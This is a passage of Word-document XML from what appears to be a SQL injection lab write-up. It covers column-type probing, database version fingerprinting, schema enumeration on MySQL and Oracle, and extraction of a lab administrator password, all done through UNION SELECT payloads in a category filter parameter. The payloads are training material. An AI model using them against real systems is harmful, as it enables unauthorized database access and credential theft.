      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="vhdl"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--&gt; Response: HTTP 200 OK (Clean Page Render)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Deduction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The backend SQL query utilizes an execution structure projecting exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 8: Determining Column Type Compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify which of the three columns can output string data by rendering an arbitrary alphanumeric string (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IYv5v5</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) provided by the testing platform. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testing Progression:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-63"/>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/filter?category='+UNION+SELECT+'IYv5v5',NULL,NULL--</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--&gt; Response: HTTP 500 Internal Server Error (Column 1 is integer/non-string)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /filter?</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-attribute"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>category</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+NULL,'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IYv5v5',NULL-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; Response: HTTP 200 OK (String </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'IYv5v5'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> reflected </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="routeros"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> product listing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Deduction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Column 2 is confirmed as text-compatible and serves as the visual exfiltration reflection point. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.3 Advanced Practitioner Practical Work: Schema Mapping &amp; Cross-Table Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 3 &amp; Lab 4: Querying Database Type and Versions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oracle requires querying the dynamic performance view </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>v$version</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> while strictly enforcing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> clause: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-64"/>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lastRenderedPageBreak/>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/filter?category=Lifestyle'+UNION+SELECT+banner,'fdsa'+FROM+v$version--</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Extracted Artifact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CORE 11.2.0.2.0 Production</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MySQL / Microsoft SQL Server Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL and MSSQL support reading the internal global variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-65"/>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/filter?category=Lifestyle'+UNION+SELECT+@@version,'fdsa'--+asdf</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Extracted Artifact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exposing the exact database build allows an analyst to look up known unpatched vulnerabilities (CVEs) affecting that specific version. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 5: Interrogating </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Non-Oracle Systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extract dynamic administrative credentials from an unknown database schema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1: Discover Table Names:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-66"/>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/filter?category='+UNION+SELECT+table_name,NULL+FROM+information_schema.tables--</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Discovered Table:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>users_gkrxdvf</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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Pr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: Discover Column Names:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-67"/>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/filter?category='+UNION+SELECT+column_name,NULL+FROM+information_schema.columns+WHERE+table_name='users_gkrxdvf'--</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Discovered Columns:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>username_zpjiaf</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>password_oiydbg</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Step 3: Extract Sensitive Data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-68"/>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/filter?category='+UNION+SELECT+username_zpjiaf,password_oiydbg+FROM+users_gkrxdvf--</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Extracted Credentials:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>administrator : 0is4hkbdcn6pmd00ds86</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Using these credentials allowed logging in via </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/login</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to confirm full administrative access. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 6: Interrogating Oracle Data Dictionary Views</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extract administrator credentials from an Oracle backend. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1: Enumerate Tables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-69"/>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/filter?category='+UNION+SELECT+NULL,table_name+FROM+all_tables--</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Discovered Table:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>USERS_TPQMKX</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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Pr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: Enumerate Columns:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-70"/>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/filter?category='+UNION+SELECT+NULL,column_name+FROM+all_tab_columns+WHERE+table_name='USERS_TPQMKX'--</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Discovered Columns:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>USERNAME_BXFGTY</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
